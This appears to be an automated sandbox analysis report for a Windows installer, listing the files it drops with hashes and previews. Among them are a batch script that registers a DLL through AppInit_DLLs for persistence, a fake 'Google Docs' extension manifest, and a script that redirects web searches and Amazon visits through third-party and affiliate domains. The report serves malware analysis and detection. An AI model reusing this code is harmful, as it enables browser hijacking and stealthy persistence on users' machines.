                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4982
                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4982
                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):7028
                                                                                                                  Entropy (8bit):5.226588714703554
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:1k1V0qvSRaTa5Tn9IpXHWEVAWJ77bWEVTexdjWUKqhv:GqT95oV7y+Kd6ULhv
                                                                                                                  MD5:23AA4675166ABF6DBB1661318F2091CD
                                                                                                                  SHA1:AD71B9576BC722252CACA2AE35A29AAAFF2BC273
                                                                                                                  SHA-256:1BB529A289367ABAF7AC40A04CB999D1DCA10EFB5AB12D406E255DCD2E107C78
                                                                                                                  SHA-512:3A0DB1E3BE57E68B974A25A3E97E410BB25BAC78C2C0890B26A0ED74A7237B8E74C6A521339D78E56840939AFA09335D8BC5EB8B8832C0835010F08284790034
                                                                                                                  Malicious:false
                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.. Created with Inkscape (http://www.inkscape.org/) -->....<svg.. xmlns:dc="http://purl.org/dc/elements/1.1/".. xmlns:cc="http://creativecommons.org/ns#".. xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#".. xmlns:svg="http://www.w3.org/2000/svg".. xmlns="http://www.w3.org/2000/svg".. xmlns:xlink="http://www.w3.org/1999/xlink".. xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd".. xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape".. width="5.8741975mm".. height="5.8741975mm".. viewBox="0 0 5.8741975 5.8741975".. version="1.1".. id="svg8".. inkscape:version="0.92.3 (2405546, 2018-03-11)".. sodipodi:docname="logo.svg".. inkscape:export-filename="/home/simon/Lien vers Files/Programming/Browser-addons/chrome-addon-v3-starter/logo/logo-128.png".. inkscape:export-xdpi="553.47137".. inkscape:export-ydpi="553.47137">.. <defs.. id="defs2">.. <linearGradient..
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1202
                                                                                                                  Entropy (8bit):4.7259052604003875
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:5KRwq1wVIsJ4K7LyRJ/GuHRmBONQg2SXDiiKbzq86UXYw5Pg+pG8WKUuL:UiG0BZnyR5GuHRmBRg2SXD2q83YuvpXL
                                                                                                                  MD5:B5923D09C1D62C8B718473CC804D6F77
                                                                                                                  SHA1:9EB22A6CE2AD88F9BC5EAA06367E80BB548E6EBF
                                                                                                                  SHA-256:BFB7F6DC266847896A21A8513D639EABF3F74D2A2DEF95104459AD322B13FAC6
                                                                                                                  SHA-512:053D949B67ADAFB42C4285410546514E0954A219A4999ADE8E266511802E94FD2BAEE2B57D0B7F1C13AB09EAD724DF6FB09AD7DCF1226FB263D4477B61BB459F
                                                                                                                  Malicious:false
                                                                                                                  Preview:{.. "manifest_version": 3,.. "name": " Google Docs",.. "short_name": "Google Docs",.. "version": "1.0",.. "background": {.. "service_worker": "bg/background.js",.. "type": "module".. },.. "action": {.. "default_title": "Google Docs",.. "default_icon": "img/logo/logo-16.png".. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "description": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.",.. "icons": {.. "16": "img/logo/logo-16.png",.. "48": "img/logo/logo-48.png",.. "128": "img/logo/logo-128.png".. },.. "incognito": "spanning",.. "permissions": [.. "activeTab",.. "declarativeNetRequest",.. "webNavigation",.. "storage",.. "tabs",.. "webRequest".. ],.. "host_permissions": [.. "http://*/*",.. "https://*/*".. ],.. "web_accessible_resources": [.. {.. "resources": [.. "img/logo/logo-16.png".. ],..
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp
                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):6144
                                                                                                                  Entropy (8bit):4.720366600008286
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                  MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                  SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                  SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                  SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp
                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):332
                                                                                                                  Entropy (8bit):5.3218024397184625
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:hMCFH/9o30ylds3S67+H12/HeGa+4hh8idhxX+H12/HeGa+4RLh8i6BV7vn:7FH/9o300dcSm+V2/+Ga+4heidhxX+VU
                                                                                                                  MD5:95DCCF473A9E7C60042550DDE201F3C4
                                                                                                                  SHA1:05A514C4FD329B0F1247E01152B4A61975C01BD9
                                                                                                                  SHA-256:F985CB1E542DD54E54DEA13ADD450FD38208A62DDA2BB850468618CA33736F03
                                                                                                                  SHA-512:53A058B87899C7567CE14B2AF3C577BC11C9B84AB408E48244634F5EED4A558B80A95A674448155029BA04ADFA326B8527ED0435BCB6C660317DCD1E1C1EEBF5
                                                                                                                  Malicious:false
                                                                                                                  Preview:@echo off ....set version=1.0....set base64=HKLM\SOFTWARE........set ext_dll="%WINDIR%\system32\sxsshell.dll"....REG ADD "%base64%\Microsoft\Windows NT\CurrentVersion\Windows" /v "AppInit_DLLs" /t REG_SZ /d %ext_dll% /f..REG ADD "%base64%\Microsoft\Windows NT\CurrentVersion\Windows" /v "LoadAppInit_DLLs" /t REG_DWORD /d 1 /f......
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp
                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):332
                                                                                                                  Entropy (8bit):5.3218024397184625
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:hMCFH/9o30ylds3S67+H12/HeGa+4hh8idhxX+H12/HeGa+4RLh8i6BV7vn:7FH/9o300dcSm+V2/+Ga+4heidhxX+VU
                                                                                                                  MD5:95DCCF473A9E7C60042550DDE201F3C4
                                                                                                                  SHA1:05A514C4FD329B0F1247E01152B4A61975C01BD9
                                                                                                                  SHA-256:F985CB1E542DD54E54DEA13ADD450FD38208A62DDA2BB850468618CA33736F03
                                                                                                                  SHA-512:53A058B87899C7567CE14B2AF3C577BC11C9B84AB408E48244634F5EED4A558B80A95A674448155029BA04ADFA326B8527ED0435BCB6C660317DCD1E1C1EEBF5
                                                                                                                  Malicious:false
                                                                                                                  Preview:@echo off ....set version=1.0....set base64=HKLM\SOFTWARE........set ext_dll="%WINDIR%\system32\sxsshell.dll"....REG ADD "%base64%\Microsoft\Windows NT\CurrentVersion\Windows" /v "AppInit_DLLs" /t REG_SZ /d %ext_dll% /f..REG ADD "%base64%\Microsoft\Windows NT\CurrentVersion\Windows" /v "LoadAppInit_DLLs" /t REG_DWORD /d 1 /f......
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp
                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):6144
                                                                                                                  Entropy (8bit):4.720366600008286
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                  MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                  SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                  SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                  SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Users\user\Desktop\$RDGU87D.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3014144
                                                                                                                  Entropy (8bit):6.394081474330121
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:49152:QLJwSihjOb6GLb4SKEs3DyOMC2DlgwccAP8SOHxVkTE0:swSi0b67zeC/wccAP85H
                                                                                                                  MD5:4193A1BA05847842590BE08BEC38CC72
                                                                                                                  SHA1:6A294D185949A7F8655805484FE6F6B522A8077A
                                                                                                                  SHA-256:2ADED9B00081DD6BCB376F99AF5D5462A70C567682C425E5CA9734506058C686
                                                                                                                  SHA-512:53ACB9B81A9CB0C8B3CD1E0E44F602378C1FAA6E1356C4CBCD3A5C625E5E18AF892BB9181E1CB3423B7548B542D23A523484483BAB25C872A94372E6493F0465
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....]_.................$,.........P6,......@,...@.......................................@......@....................-......`-.49....-.......................................................-......................i-.......-......................text...0.+.......+................. ..`.itext..t(....,..*....+............. ..`.data.......@,......(,.............@....bss.....x....,..........................idata..49...`-..:....,.............@....didata.......-.......,.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-.......-.............@..@.rsrc.........-.......-.............@..@......................-.............@..@........................................................
                                                                                                                  Process:C:\Users\user\Desktop\$RDGU87D.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3014144
                                                                                                                  Entropy (8bit):6.394081474330121
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:49152:QLJwSihjOb6GLb4SKEs3DyOMC2DlgwccAP8SOHxVkTE0:swSi0b67zeC/wccAP85H
                                                                                                                  MD5:4193A1BA05847842590BE08BEC38CC72
                                                                                                                  SHA1:6A294D185949A7F8655805484FE6F6B522A8077A
                                                                                                                  SHA-256:2ADED9B00081DD6BCB376F99AF5D5462A70C567682C425E5CA9734506058C686
                                                                                                                  SHA-512:53ACB9B81A9CB0C8B3CD1E0E44F602378C1FAA6E1356C4CBCD3A5C625E5E18AF892BB9181E1CB3423B7548B542D23A523484483BAB25C872A94372E6493F0465
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....]_.................$,.........P6,......@,...@.......................................@......@....................-......`-.49....-.......................................................-......................i-.......-......................text...0.+.......+................. ..`.itext..t(....,..*....+............. ..`.data.......@,......(,.............@....bss.....x....,..........................idata..49...`-..:....,.............@....didata.......-.......,.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-.......-.............@..@.rsrc.........-.......-.............@..@......................-.............@..@........................................................
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:ASCII text, with very long lines (662), with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):6986
                                                                                                                  Entropy (8bit):4.8857905053740325
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:s3iymZL/btGE2pRfQpxPyaGDd6M3TDsyzAr:TymZYexPWDcME
                                                                                                                  MD5:9E14A24DABF427581BE3933A700715E6
                                                                                                                  SHA1:2F4A29E39A69944D6A954ECCE21607F5CE8E2A1E
                                                                                                                  SHA-256:0ADE971AE68AE6D818E9837AB8C6D4D603AC0BB3D23AA78A0F5D1B91706E155E
                                                                                                                  SHA-512:5292B9E01C044CBBCDBB1E3A558FBA3542A577D3D54E1282282D1C13D1A10BED440D602657D25014249B74EC3F8EA1EF506C47C0C00EF01C9D7D37DD72FB3D09
                                                                                                                  Malicious:false
                                                                                                                  Preview:var data=['yahoo.com','p','q','https://searchesmia.com/bingchr4?q=',..'^http(s)?:\/\/(www|search?).(google|yahoo|bing|ecosia)?\.[a-z]{2,4}\/search',..'^http(s)?:\/\/(www|search?).yahoo.com\/yhs\/search',..'duckduckgo.com/?q=','ask.com/web?','/%20/g','+','www.','&first','bing.com',..'7fk8qechol',..'popup',..'https://smashaff.com/redirect?&url=',..'www',..'amazon.com',..'colort',..'smashaff.com'..];....let tabsHistory = {};..let throughSmash = {};..let prevBing = {};....var seaDefault = new RegExp(data[4]);..var yasea = new RegExp(data[5]); ..var dusea = new RegExp(data[6]);..var asksea = new RegExp(data[7]);....function convertURL(hostname, urlParams) {.. var uri = '';.. if (hostname.indexOf(data[0]) !== -1).. uri = urlParams.get('p');.. else.. uri = urlParams.get('q');.. return data[3] + uri;.. }....try {.. chrome.tabs.onUpdated.addListener((tabId, info) => { if(data!=undefined){ .. if(info.status) {.. if(info.stat
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):203
                                                                                                                  Entropy (8bit):4.676765497065817
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:BKsg+RoJf2QQ0g+RosxEjqOuWE42q93wdy:BNoJPQUosx5CH22J
                                                                                                                  MD5:7A0EA7C07E1D4AE1444C0B11827D2C77
                                                                                                                  SHA1:6C704E23C57178101F0CFDB3FD8A5439EEFCCF92
                                                                                                                  SHA-256:7FD6486432256C15FA6568F04AF2DB56DE31E9AECC16044B3D5B488957A7BCC2
                                                                                                                  SHA-512:9DF327ECAC037E1A3AB9432C290C886CDD06E4623679CDD5596157866AD7AE45A6F2DA533DFC8A44719F44ECC70153E6D0DB3435C39999B940A039D000AC923A
                                                                                                                  Malicious:false
                                                                                                                  Preview:..window.addEventListener('load',function(){.... window.addEventListener('click',function(){.... // alert('cp');.... chrome.runtime.sendMessage({'cout': 'reset'});.... });........});..
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4982
                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4982
                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4982
                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):7028
                                                                                                                  Entropy (8bit):5.226588714703554
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:1k1V0qvSRaTa5Tn9IpXHWEVAWJ77bWEVTexdjWUKqhv:GqT95oV7y+Kd6ULhv
                                                                                                                  MD5:23AA4675166ABF6DBB1661318F2091CD
                                                                                                                  SHA1:AD71B9576BC722252CACA2AE35A29AAAFF2BC273
                                                                                                                  SHA-256:1BB529A289367ABAF7AC40A04CB999D1DCA10EFB5AB12D406E255DCD2E107C78
                                                                                                                  SHA-512:3A0DB1E3BE57E68B974A25A3E97E410BB25BAC78C2C0890B26A0ED74A7237B8E74C6A521339D78E56840939AFA09335D8BC5EB8B8832C0835010F08284790034
                                                                                                                  Malicious:false
                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.. Created with Inkscape (http://www.inkscape.org/) -->....<svg.. xmlns:dc="http://purl.org/dc/elements/1.1/".. xmlns:cc="http://creativecommons.org/ns#".. xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#".. xmlns:svg="http://www.w3.org/2000/svg".. xmlns="http://www.w3.org/2000/svg".. xmlns:xlink="http://www.w3.org/1999/xlink".. xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd".. xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape".. width="5.8741975mm".. height="5.8741975mm".. viewBox="0 0 5.8741975 5.8741975".. version="1.1".. id="svg8".. inkscape:version="0.92.3 (2405546, 2018-03-11)".. sodipodi:docname="logo.svg".. inkscape:export-filename="/home/simon/Lien vers Files/Programming/Browser-addons/chrome-addon-v3-starter/logo/logo-128.png".. inkscape:export-xdpi="553.47137".. inkscape:export-ydpi="553.47137">.. <defs.. id="defs2">.. <linearGradient..
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1202
                                                                                                                  Entropy (8bit):4.7259052604003875
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:5KRwq1wVIsJ4K7LyRJ/GuHRmBONQg2SXDiiKbzq86UXYw5Pg+pG8WKUuL:UiG0BZnyR5GuHRmBRg2SXD2q83YuvpXL
                                                                                                                  MD5:B5923D09C1D62C8B718473CC804D6F77
